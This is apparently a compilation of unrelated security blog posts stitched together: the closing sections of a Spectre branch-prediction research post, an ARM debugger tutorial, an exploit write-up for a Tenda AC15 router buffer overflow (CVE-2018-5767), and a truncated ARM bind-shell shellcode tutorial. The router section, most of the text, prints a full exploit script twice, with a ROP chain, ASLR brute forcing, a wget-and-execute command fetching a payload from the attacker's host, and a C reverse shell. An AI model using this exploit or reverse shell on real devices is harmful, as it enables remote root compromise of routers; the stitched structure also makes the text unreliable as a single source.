This section contains an even higher amount of speculation than the rest of this blogpost — it contains untested ideas that might well be useless.

Leaking without data cache timing

It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.

Other microarchitectures

Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.

Other JIT engines

We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical — in particular, JavaScript engines.

More efficient scanning for host-virtual addresses and cache sets

In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

 

The same might work for cache sets — use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.

Dumping the complete BTB state

Given that the generic BTB seems to only be able to distinguish 2^(31-8) or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

 

The source address aliasing would reduce the usefulness somewhat, but because target addresses don’t suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

 

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.

Variant 2: Leaking with more efficient gadgets

If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.

Various speedups

In particular the variant 2 PoC is still a bit slow. This is probably partly because:

 

  • It only leaks one bit at a time; leaking more bits at a time should be doable.
  • It heavily uses IRETQ for hiding control flow from the processor.

 

It would be interesting to see what data leak rate can be achieved using variant 2.

Leaking or injection through the return predictor

If the return predictor also doesn’t lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn’t reloaded before the return instruction).

 

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.

Leaking data out of the indirect call predictor

We have attempted to leak target information out of the indirect call predictor, but haven’t been able to make it work.

Vendor statements

The following statements were provided to us regarding this issue by the vendors to whom Project Zero disclosed this vulnerability:

Intel

Intel is committed to improving the overall security of computer systems. The methods described here rely on common properties of modern microprocessors. Thus, susceptibility to these methods is not limited to Intel processors, nor does it mean that a processor is working outside its intended functional specification. Intel is working closely with our ecosystem partners, as well as with other silicon vendors whose processors are affected, to design and distribute both software and hardware mitigations for these methods.

For more information and links to useful resources, visit:

https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr
http://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf

AMD

ARM

Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

 

Specific details regarding the affected processors and mitigations can be found at this website: https://developer.arm.com/support/security-update

 

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.

Literature

Note that some of these documents — in particular Intel’s documentation — change over time, so quotes from and references to it may not reflect the latest version of Intel’s documentation.

 

  • https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel’s optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
    • «Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems.»
    • «Loads can:[…]Be carried out speculatively, before preceding branches are resolved.»
    • «Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition.»
    • «if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches»
    • «Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch).»
  • https://software.intel.com/en-us/articles/intel-sdm: Intel’s Software Developer Manuals
  • http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog’s documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
  • http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm’s research based on this provided the basic idea behind variant 2.
  • https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
  • https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
  • https://www.sophia.re/thesis.pdf: Sophia D’Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
  • https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
  • https://www.jilp.org/: This journal contains many articles on branch prediction.
  • http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel’s Ivy Bridge architecture.

References

[1] This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh’s work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.
[2] The precise model names are listed in the section «Tested Processors». The code for reproducing this is in the writeup_files.tar archive in our bugtracker, in the folders userland_test_x86 and userland_test_aarch64.
[3] The attacker-controlled offset used to perform an out-of-bounds access on an array by this PoC is a 32-bit value, limiting the accessible addresses to a 4GiB window in the kernel heap area.
[4] This PoC won’t work on CPUs with SMAP support; however, that is not a fundamental limitation.
[5] linux-image-4.9.0-3-amd64 at version 4.9.30-2+deb9u2 (available at http://snapshot.debian.org/archive/debian/20170701T224614Z/pool/main/l/linux/linux-image-4.9.0-3-amd64_4.9.30-2%2Bdeb9u2_amd64.deb, sha256 5f950b26aa7746d75ecb8508cc7dab19b3381c9451ee044cd2edfd6f5efff1f8, signed via Release.gpg, Release, Packages.xz); that was the current distro kernel version when I set up the machine. It is very unlikely that the PoC works with other kernel versions without changes; it contains a number of hardcoded addresses/offsets.
[6] The phone was running an Android build from May 2017.
[9] More than 2^15 mappings would be more efficient, but the kernel places a hard cap of 2^16 on the number of VMAs that a process can have.
[10] Intel’s optimization manual states that «In the first implementation of HT Technology, the physical execution resources are shared and the architecture state is duplicated for each logical processor», so it would be plausible for predictor state to be shared. While predictor state could be tagged by logical core, that would likely reduce performance for multithreaded processes, so it doesn’t seem likely.
[11] In case the history buffer was a bit bigger than we had measured, we added some margin — in particular because we had seen slightly different history buffer lengths in different experiments, and because 26 isn’t a very round number.
[12] The basic idea comes from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf, section IV, although the authors of that paper still used hugepages.

ARM Reverse Engineering – Hacking Double Variables

Let’s review our code.

#include <iostream>

int main(void) {
    double myNumber = 1337.77;

    std::cout << myNumber << std::endl;

    return 0;
}

Let’s debug!

Let’s set a breakpoint at main+24 and continue.

We see the strd r2, [r11, #-12] and we have to fully understand what it means: we are storing the register pair r2 and r3 (strd stores a doubleword) into memory at an offset of -12 from register r11. Let’s now examine what exactly resides there.

Voila! We see 1337.77 at that offset, stored at address 0x7efff230 in memory.

Let’s step into twice, which executes vldr d0, [r11, #-12]. As we understand it, 1337.77 will now be loaded into d0, a double-precision register of the floating-point unit. Let’s now print the value in that register below.
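To see why a single double occupies two 32-bit registers before it lands in d0, the encoding can be reproduced on any machine. The Python 3 sketch below assumes a little-endian target, where strd places the first register of the pair at the lower address; the function names are made up for this illustration.

```python
import struct


def double_to_register_pair(value):
    """Split an IEEE 754 double into (low word, high word)."""
    low, high = struct.unpack("<II", struct.pack("<d", value))
    return low, high


def register_pair_to_double(low, high):
    """Rebuild the double from the two 32-bit words."""
    return struct.unpack("<d", struct.pack("<II", low, high))[0]
```

Calling double_to_register_pair(1337.77) yields the two words that r2 and r3 would hold under this assumption, and the same helper shows what a replacement value would look like in memory.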

Let’s hack the d0 register!

Now let’s reexamine the value inside d0.

Let’s continue.

Successfully hacked!

REMOTE CODE EXECUTION ROP,NX,ASLR (CVE-2018-5767) Tenda’s AC15 router

INTRODUCTION (CVE-2018-5767)

In this post we will be presenting a pre-authenticated remote code execution vulnerability present in Tenda’s AC15 router. We start by analysing the vulnerability, before moving on to our regular pattern of exploit development – identifying problems and then fixing those in turn to develop a working exploit.

N.B.: Numerous attempts were made to contact the vendor with no success. Due to the nature of the vulnerability, offsets have been redacted from the post to prevent point and click exploitation.

LAYING THE GROUNDWORK

The vulnerability in question is caused by a buffer overflow due to unsanitised user input being passed directly to a call to sscanf. The figure below shows the vulnerable code in the R7WebsSecurityHandler function of the HTTPD binary for the device.

Note that the “password=” parameter is part of the Cookie header. We see that the code uses strstr to find this field, and then copies everything after the equals sign (excluding a ‘;’ character, which is important for later) into a fixed size stack buffer.

If we send a large enough password value, we can crash the server. In the following picture we have attached to the process using a cross-compiled gdbserver binary; we can access the device using telnet (a story for another post).

This crash isn’t exactly ideal. We can see that it’s due to an invalid read attempting to load a byte from R3 which points to 0x41414141. From our analysis this was identified as occurring in a shared library and instead of looking for ways to exploit it, we turned our focus back on the vulnerable function to try and determine what was happening after the overflow.

In the next figure we see the issue: if the string copied into the buffer contains “.gif”, then the function returns immediately without further processing. The code isn’t looking for “.gif” in the password, but in the user controlled buffer for the whole request. Avoiding further processing of an overflowed buffer and returning immediately is exactly what we want (loc_2f7ac simply jumps to the function epilogue).

Appending “.gif” to the end of a long password string of “A”s gives us a segfault with PC=0x41414141. With the ability to reliably control the flow of execution, we can now outline the problems we must address and begin to solve them, developing a working exploit along the way.

To begin with, the following information is available about the binary:

file httpd
format elf
type EXEC (Executable file)
arch arm
bintype elf
bits 32
canary false
endian little
intrp /lib/ld-uClibc.so.0
machine ARM
nx true
pic false
relocs false
relro no
static false

I’ve only included the most important details – mainly, the binary is a 32bit ARMEL executable, dynamically linked with NX being the only exploit mitigation enabled (note that the system has randomize_va_space = 1, which we’ll have to deal with). Therefore, we have the following problems to address:

  1. Gain reliable control of PC through offset of controllable buffer.
  2. Bypass No Execute (NX, the stack is not executable).
  3. Bypass Address space layout randomisation (randomize_va_space = 1).
  4. Chain it all together into a full exploit.

PROBLEM SOLVING 101

The first problem to solve is a general one when it comes to exploiting memory corruption vulnerabilities such as this –  identifying the offset within the buffer at which we can control certain registers. We solve this problem using Metasploit’s pattern create and pattern offset scripts. We identify the correct offset and show reliable control of the PC register:
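For readers without Metasploit at hand, the idea behind the two scripts can be sketched in a few lines of Python 3. This is a simplified re-implementation for illustration, not Metasploit's code: it builds the familiar non-repeating "Aa0Aa1Aa2..." sequence and looks up the four bytes found in PC, assuming a little-endian target.

```python
import itertools
import string
import struct


def pattern_create(length):
    """Build a cyclic pattern of upper/lower/digit triples (max 20280 chars)."""
    chunks = []
    triples = itertools.product(string.ascii_uppercase,
                                string.ascii_lowercase,
                                string.digits)
    for upper, lower, digit in triples:
        chunks.append(upper + lower + digit)
        if 3 * len(chunks) >= length:
            break
    return "".join(chunks)[:length]


def pattern_offset(pc_value, length=8192):
    """Return the offset of the 4 bytes seen in PC, or -1 if absent."""
    needle = struct.pack("<I", pc_value)
    return pattern_create(length).encode("ascii").find(needle)
```

Sending pattern_create(n) as the password and feeding the crashing PC value to pattern_offset gives the number of filler bytes needed before the return address.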

With problem 1 solved, our next task involves bypassing No Execute. No Execute (NX or DEP) simply prevents us from executing shellcode on the stack. It ensures that there are no writeable and executable pages of memory. NX has been around for a while, so we won’t go into great detail about how it works or its bypasses; all we need is some ROP magic.

We make use of the “Return to Zero Protection” (ret2zp) method [1]. The problem with building a ROP chain for the ARM architecture is down to the fact that function arguments are passed through the R0-R3 registers, as opposed to the stack for Intel x86. To bypass NX on an x86 processor we would simply carry out a ret2libc attack, whereby we store the address of libc’s system function at the correct offset, and then a null terminated string at offset+4 for the command we wish to run:

To perform a similar attack on our current target, we need to pass the address of our command through R0, and then need some way of jumping to the system function. The sort of gadget we need for this is a mov instruction whereby the stack pointer is moved into R0. This gives us the following layout:

We identify such a gadget in the libc shared library; however, the gadget performs the following instructions:

mov r0, sp
blx r3

This means that before jumping to this gadget, we must have the address of system in R3. To solve this problem, we simply locate a gadget that allows us to mov or pop values from the stack into R3, and we identify such a gadget again in the libc library:

pop {r3,r4,r7,pc}

This gadget has the added benefit of loading PC from SP+12, so our buffer should look as follows:

Note the ‘;.gif’ string at the end of the buffer: recall that the call to sscanf stops at a ‘;’ character, whilst the ‘.gif’ string will allow us to cleanly exit the function. With the following Python code, we have essentially bypassed NX with two gadgets:

import struct

libc_base = ****
curr_libc = libc_base + (0x7c << 12)
system = struct.pack("<I", curr_libc + ****)
#: pop {r3, r4, r7, pc}
pop = struct.pack("<I", curr_libc + ****)
#: mov r0, sp ; blx r3
mv_r0_sp = struct.pack("<I", curr_libc + ****)
password = "A"*offset
password += pop + system + "B"*8 + mv_r0_sp + command + ".gif"

With problem 2 solved, we now move on to our third problem: bypassing ASLR. Address space layout randomisation can be very difficult to bypass when we are attacking network based applications; this is generally due to the fact that we need some form of information leak. Although ASLR is not enabled on the binary itself, the shared libraries load at different addresses on each execution. One method to generate an information leak would be to use “native” gadgets present in the HTTPD binary (which does not have ASLR) and ROP into the leak. The problem here, however, is that each gadget contains a null byte, and so we can only use one. If we look at how random the randomisation really is, we see that the library addresses (specifically libc, which contains our gadgets) only differ by one byte on each execution. For example, on one run libc’s base may be located at 0xXXXXXXXX, and on the next run it is at 0xXXXXXXXX. We could theoretically guess this value, and we would have a small chance of guessing correctly.

This is where our faithful watchdog process comes in. One process running on this device is responsible for restarting services that have crashed, so every time the HTTPD process segfaults, it is immediately restarted, which is pretty handy for us. This is enough for us to do some naïve brute forcing, using the following process:

With NX and ASLR successfully bypassed, we now need to put this all together (problem 4). This, however, provides us with another set of problems to solve:

  1. How do we detect the exploit has been successful?
  2. How do we use this exploit to run arbitrary code on the device?

We start by solving problem 2, which in turn will help us solve problem 1. There are a few steps involved with running arbitrary code on the device. Firstly, we can make use of tools on the device to download arbitrary scripts or binaries. For example, the following command string will download a file from a remote server over HTTP, change its permissions to executable and then run it:

command = "wget http://192.168.0.104/malware -O /tmp/malware && chmod 777 /tmp/malware && /tmp/malware &;"

The “malware” binary should give some indication that the device has been exploited remotely. To achieve this, we write a simple TCP connect-back program. This program creates a connection back to our attacking system and duplicates the socket onto the stdin, stdout and stderr file descriptors; it’s just a simple reverse shell.

#include <sys/socket.h>
#include <sys/types.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char **argv)
{
    struct sockaddr_in addr;
    int sock = socket(AF_INET, SOCK_STREAM, 0);

    memset(&addr, 0x00, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(31337);
    addr.sin_addr.s_addr = inet_addr("192.168.0.104");

    /* Connect back to the attacking system; give up if that fails. */
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        return 1;

    /* Redirect stdin, stdout and stderr to the socket, then spawn a shell. */
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);
    system("/bin/sh");
    return 0;
}

We need to cross-compile this code into an ARM binary; to do this, we use a prebuilt toolchain downloaded from uClibc. We also want to automate the entire exploit, so we use the following code to fill the connect-back IP address and port into the C source, compile it in a subprocess, and serve the resulting binary over HTTP using Python’s SimpleHTTPServer module.

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

#write the code with ip and port to a.c

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

#wait for the process to terminate so we can get its return code

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

This code will allow us to utilise the wget tool present on the device to fetch our binary and run it, which in turn will allow us to solve problem 1. We can identify whether the exploit has been successful by waiting for connections back. The abstract diagram in the next figure shows how we can make use of a few threads with a global flag to solve problem 1 given the solution to problem 2.

The functions shown in the following code take care of these processes:

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuously, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777

/tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base address each time

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d”%i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the process.

time.sleep(1)

 

print “[+] Exploit done”

Finally, we put all of this together by spawning the individual threads, as well as getting command line options as usual:

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”,

help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”,

help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”,

help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your  ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified,

you need a uclibc arm cross compiler,

such as https://www.uclibc.org/downloads/

binaries/0.9.30/cross-compiler-arm4l.tar.bz2″)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

With all of this together, we run the code and after a few minutes get our reverse shell as root:

The full code is here:

#!/usr/bin/env python

import urllib2

import struct

import time

import socket

from optparse import *

import SimpleHTTPServer

import SocketServer

import threading

import sys

import os

import subprocess

 

ARM_REV_SHELL = (

“#include <sys/socket.h>\n”

“#include <sys/types.h>\n”

“#include <string.h>\n”

“#include <stdio.h>\n”

“#include <netinet/in.h>\n”

“int main(int argc, char **argv)\n”

“{\n”

”           struct sockaddr_in addr;\n”

”           socklen_t addrlen;\n”

”           int sock = socket(AF_INET, SOCK_STREAM, 0);\n”

 

”           memset(&addr, 0x00, sizeof(addr));\n”

 

”           addr.sin_family = AF_INET;\n”

”           addr.sin_port = htons(%d);\n”

”           addr.sin_addr.s_addr = inet_addr(\”%s\”);\n”

 

”           int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n”

 

”           dup2(sock, 0);\n”

”           dup2(sock, 1);\n”

”           dup2(sock, 2);\n”

 

”           system(\”/bin/sh\”);\n”

“}\n”

)

 

REV_PORT = 31337

HTTPD_PORT = 8888

DONE = False

 

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuously, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

 

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base continuously

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d” %i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the process.

time.sleep(1)

 

print “[+] Exploit done”

 

 

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”, help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”, help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”, help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2”)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

TCP Bind Shell in Assembly (ARM 32-bit)

In this tutorial, you will learn how to write TCP bind shellcode that is free of null bytes and can be used as shellcode for exploitation. When I talk about exploitation, I’m strictly referring to approved and legal vulnerability research. For those of you relatively new to software exploitation, let me tell you that this knowledge can, in fact, be used for good. If I find a software vulnerability like a stack overflow and want to test its exploitability, I need working shellcode. Not only that, I need techniques to use that shellcode in a way that it can be executed despite the security measures in place. Only then can I show the exploitability of this vulnerability and the techniques malicious attackers could be using to take advantage of security flaws.

After going through this tutorial, you will not only know how to write shellcode that binds a shell to a local port, but also how to write any shellcode for that matter. Going from bind shellcode to reverse shellcode is just a matter of changing one or two functions and some parameters; most of it stays the same. Writing a bind or reverse shell is more difficult than creating a simple execve() shell. If you want to start small, you can learn how to write a simple execve() shell in assembly before diving into this slightly more extensive tutorial. If you need a refresher in ARM assembly, take a look at my ARM Assembly Basics tutorial series, or use this Cheat Sheet:

Before we start, I’d like to remind you that we’re creating ARM shellcode and therefore need to set up an ARM lab environment if you don’t already have one. You can set it up yourself (Emulate Raspberry Pi with QEMU) or save time and download the ready-made Lab VM I created (ARM Lab VM). Ready?

UNDERSTANDING THE DETAILS

First of all, what is a bind shell and how does it really work? With a bind shell, you open up a communication port or a listener on the target machine. The listener then waits for an incoming connection, you connect to it, the listener accepts the connection and gives you shell access to the target system.

This is different from how Reverse Shells work. With a reverse shell, you make the target machine communicate back to your machine. In that case, your machine has a listener port on which it receives the connection back from the target system.

 

Both types of shell have their advantages and disadvantages depending on the target environment. It is, for example, more common that the firewall of the target network fails to block outgoing connections than incoming. This means that your bind shell would bind a port on the target system, but since incoming connections are blocked, you wouldn’t be able to connect to it. Therefore, in some scenarios, it is better to have a reverse shell that can take advantage of firewall misconfigurations that allow outgoing connections. If you know how to write a bind shell, you know how to write a reverse shell. There are only a couple of changes necessary to transform your assembly code into a reverse shell once you understand how it is done.

To translate the functionalities of a bind shell into assembly, we first need to get familiar with the process of a bind shell:

  1. Create a new TCP socket
  2. Bind socket to a local port
  3. Listen for incoming connections
  4. Accept incoming connection
  5. Redirect STDIN, STDOUT and STDERR to a newly created socket from a client
  6. Spawn the shell

This is the C code we will use for our translation.

#include <stdio.h> 
#include <sys/types.h>  
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <unistd.h>      // dup2(), execve(), close()

int host_sockid;    // socket file descriptor 
int client_sockid;  // client file descriptor 

struct sockaddr_in hostaddr;            // server aka listen address

int main() 
{ 
    // Create new TCP socket 
